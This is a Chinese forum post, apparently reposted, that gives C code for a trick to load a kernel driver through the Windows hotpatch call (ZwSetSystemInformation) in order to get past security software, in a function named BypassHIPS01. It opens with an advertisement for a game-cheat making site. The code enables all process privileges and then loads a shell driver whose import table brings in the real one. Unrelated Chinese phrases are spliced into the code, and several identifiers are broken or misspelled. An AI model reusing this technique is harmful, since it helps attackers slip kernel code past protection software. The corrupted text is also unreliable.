利用系统Hotpatch加载驱动的一种比较取巧的方法
学习各种高级外挂制作技术,马上去百度搜索"魔鬼作坊",点击第一个站进入,快速成为做挂达人。
其实没啥可讲,也没啥可说的,这代码同样的是很老的代码,只是一直没放的原因是为了保持互联网和谐,但是都快圣诞,还是放一下吧~
首先这是一个基于ZwSetSystemInformation加载驱动的方法,
其次这是一个只被部分杀毒拦截的方法——别指望这个能过360,因为mj早知道这个~
然后说一下为啥是取巧,因为这是利用MmLoadSystemImage对驱动文件处理时,会自动加载并执行文件的导入表的其他驱动,于是你懂得。
//Enable specific privilege
BOOL EnableSpecificPrivilege(BOOL bEnable,LPCTSTR Name)鱼和水的关系
{
BOOL bResult=FALSE;
HANDLE hToken;
TOKEN_PRIVILEGES TokenPrivileges;
if(OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY| TOKEN_ADJUST_PRIVILEGES,&hToken)==0)
{
return FALSE;
}
TokenPrivileges.PrivilegeCount=1;
TokenPrivileges.Privileges[0].Attributes=bEnable?SE_PRIVILEGE_ENABLED:0;
bResult=LookupPrivilegeValue(NULL,Name,&TokenPrivileges.Privileges[0].Luid);
if(!bResult)
{
励志的昵称CloHandle(hToken);
return FALSE;
wiat
}有关自由的名言
bResult= AdjustTokenPrivileges(hToken,FALSE,&TokenPrivileges,sizeof(TOKEN_PRIVILEGES),NULL, NULL);
if(GetLastError()!=ERROR_SUCCESS||!bResult)
{
CloHandle(hToken);
return FALSE;
}
王者开挂CloHandle(hToken);
return TRUE;
}
//Jan42005
//Enable all privilege,return num of privileges successfully enabled
DWORD EnableAllPrivilege(BOOL bEnable)
{
DWORD count=0;
///
count+=EnableSpecificPrivilege(bEnable,SE_ASSIGNPRIMARYTOKEN_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_AUDIT_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_BACKUP_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_CHANGE_NOTIFY_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_CREATE_PAGEFILE_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_CREATE_PERMANENT_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_CREATE_TOKEN_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_DEBUG_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_INC_BASE_PRIORITY_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_INCREASE_QUOTA_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_LOAD_DRIVER_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_LOCK_MEMORY_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_PROF_SINGLE_PROCESS_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_REMOTE_SHUTDOWN_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_RESTORE_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_SECURITY_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_SHUTDOWN_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_SYSTEM_ENVIRONMENT_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_SYSTEM_PROFILE_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_SYSTEMTIME_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_TAKE_OWNERSHIP_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_TCB_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_UNSOLICITED_INPUT_NAME);
count+=EnableSpecificPrivilege(bEnable,SE_MACHINE_ACCOUNT_NAME);
return count;
}
//Mar72006
BOOL BypassHIPS01()
{
struct{
SYSTEM_HOTPATCH_CODE_INFORMATION shci;
WCHAR KernelPath[MAX_PATH];
}s;
WCHAR FileName[MAX_PA TH];
WCHAR RealSysName[MAX_PA TH];
EnableAllPrivilege(TRUE);
ZWSETSYSTEMINFORMATION举止言谈
pNtSetSystemInformation=(ZWSETSYSTEMINFORMATION)GetProcAddress(GetModuleHand le(_T("ntdll.dll")),"ZwSetSystemInformation");
//LPTHREAD_START_ROUTINE pLdrHotPatchRoutine= (LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(_T("ntdll.dll")), "LdrHotPatchRoutine");
GetModuleFileNameW(NULL,FileName,MAX_PATH);
(wcsrchr(FileName,L'\\'))[0]=L'\0';
OutputDebugStringW(FileName);
StringCbPrintfW(RealSysName,MAX_PA TH,L"\\??\\%s\\HotpatchSys.sys",FileName);
OutputDebugStringW(RealSysName);
if(pNtSetSystemInformation)
{情人节的浪漫
s.shci.Flags=HOTP_USE_MODULE| HOTP_PA TCH_APPLY|HOTP_KERNEL_MODULE;
s.shci.InfoSize=sizeof(s);
s.shci.KernelInfo.NameOfft=(WORD)((ULONG_PTR)s.KernelPath
-(ULONG_PTR)&s.shci);
s.shci.KernelInfo.NameLegth=2*wcslen(RealSysName);
StringCbCopyW(s.KernelPath,MAX_PA TH,RealSysName);
OutputDebugStringW(s.KernelPath);
//_tprintf(_T("Flags:%x,Size:%x,Offt:%x,NameLegth:%x\r\n"),s.shci.Flags,s.shci.InfoSize,s.shc i.KernelInfo.NameOfft,s.shci.KernelInfo.NameLegth);
//s.shci.UrModeInfo.NameOfft=(WORD)((ULONG_PTR)s.SourceName -(ULONG_PTR)&s.shci);
//s.shci.UrModeInfo.NameLegth= sizeof(SOURCE_NAME)-sizeof(WCHAR);
//s.shci.UrModeInfo.TargetNameOfft= (WORD)((ULONG_PTR)s.TargetName-(ULONG_PTR)&s.shci);
//s.shci.UrModeInfo.TargetNameLegth= sizeof(TARGET_NAME)-sizeof(WCHAR);
//s.shci.UrModeInfo.PatchingFinished=FALSE;
//lstrcpynW(s.SourceName,SOURCE_NAME,sizeof(s.SourceName));
//lstrcpynW(s.TargetName,TARGET_NAME,sizeof(s.TargetName));
//hThread=CreateThread(NULL,0,pLdrHotPatchRoutine,&s,0,NULL);
//WaitForSingleObject(hThread,INFINITE);
//CloHandle(hThread);
NTSTA TUS x= pNtSetSystemInformation(SystemHotpatchInformation,&s,sizeof(s));
if(x==STA TUS_INVALID_IMAGE_FORMAT)
{
return TRUE;
}
迭香}
return FALSE;
}
加载的hotpatch.sys其实是一个空壳真正的驱动是由它的导入表导入的某个内核动态库驱动~
需要的hotpatch定义用的头文件在本帖的附件里给出~
